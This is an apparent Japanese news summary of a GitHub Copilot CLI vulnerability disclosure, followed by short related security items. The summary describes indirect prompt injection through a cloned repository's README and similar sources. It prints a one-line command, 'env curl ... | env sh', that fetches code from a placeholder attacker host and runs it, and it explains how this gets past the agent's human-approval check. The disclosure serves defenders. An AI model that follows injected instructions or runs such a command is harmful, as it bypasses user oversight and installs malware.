GitHub Copilot CLIの脆弱性により、プロンプトインジェクション経由でのマルウェア実行が可能

脆弱性の概要
GitHub Copilot CLIには、ユーザーの承認なしに間接的なプロンプトインジェクションを介して任意のシェルコマンドが実行される脆弱性が存在します。マルウェアは外部サーバーからダウンロードされ、Copilot CLIへの初期クエリ以外のユーザー操作なしで実行される可能性があります。
攻撃の仕組み
攻撃の連鎖には以下が含まれます:
- ユーザーがオープンソースリポジトリを探索しながらGitHub Copilot CLIにクエリを実行
- CopilotがクローンしたリポジトリのREADMEファイルに保存されたプロンプトインジェクションに遭遇(またはウェブ検索結果、MCPツール呼び出し結果、ターミナルコマンド出力などの他のベクター)
- 悪意のあるコマンドが人間による承認システムを回避
保護メカニズムの回避
GitHub Copilotは、潜在的に有害なコマンドの実行前にユーザーの同意を必要とする人間による承認システムを使用しています。このシステムは、以下の場合を除いてトリガーされます:
- ユーザーがコマンドを自動実行するように明示的に設定している場合
- コマンドがソースコード内のハードコードされた「読み取り専用」リストに含まれている場合
外部URLアクセスチェックでは、curl、wget、またはCopilotの組み込みウェブフェッチツールなどのコマンドに対してユーザーの承認が必要です。しかし、攻撃者は以下の方法を使用してこれらの保護を回避できます:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shenvコマンドはハードコードされた読み取り専用リストに含まれているため、承認なしで自動的に実行されます。curlとshはenvへの引数として渡されるため、バリデータによってサブコマンドとして正しく認識されず、curlなどのコマンドを検出するURL権限チェックを回避します。
GitHubの対応
GitHubは次のように回答しました:「報告内容を確認し、調査結果を検証しました。内部評価の結果、これは既知の問題であり、重大なセキュリティリスクとはならないと判断しました。将来的にはこの機能をより厳格にする可能性がありますが、現時点で発表できることはありません。」
範囲と制限
説明したコマンド解析の脆弱性はmacOS固有のものです。しかし、GitHub Copilotには、OSに依存しないリスクとWindows固有のリスクの両方を含む追加の脆弱性が存在します。他のコマンド解析の脆弱性により、任意のファイルの読み取りと書き込みが可能になります。
📖 完全なソースを読む: HN LLM Tools
👀 See Also

McpVanguardプロキシがOpenClawスキルデータの外部流出をブロック
CiscoのAIセキュリティチームがサードパーティ製OpenClawスキルによるサイレントデータ流出とプロンプトインジェクションを発見したことを受け、開発者がMcpVanguardをリリースしました。これはAIエージェントとそのツールの間に配置され、悪意のある呼び出しが実行される前にブロックするプロキシです。

クラーの法則:OpenClawエージェント向けオープンソースセキュリティルールセット
139のセキュリティルールを含むオープンソースのJSONルールセットで、破壊的なコマンドをブロックし、認証ファイルを保護し、指示ファイルを不正なエージェント編集から守ります。ツール層で正規表現パターンを使用し、LLM依存ゼロで動作します。

FreeBSDカーネルのkgssapi.koにおけるスタックバッファオーバーフローによるRCE(CVE-2026-4747)
FreeBSDのkgssapi.koモジュールにおけるスタックバッファオーバーフローにより、NFSサーバー経由でリモートからカーネルRCEを実行し、rootシェルを取得可能です。この脆弱性は、特定のパッチが適用されていないFreeBSD 13.5、14.3、14.4、15.0に影響します。

FastAPI Guardを使用して、OpenClawインスタンスを攻撃から保護します。
FastAPI Guardは、IPフィルタリング、地域ブロック、レート制限、侵入検知を含む17のセキュリティチェックを追加するミドルウェアを提供します。このツールは、OpenClawセキュリティ監査で文書化された512の脆弱性と40,000以上の公開インスタンスを示す攻撃をブロックします。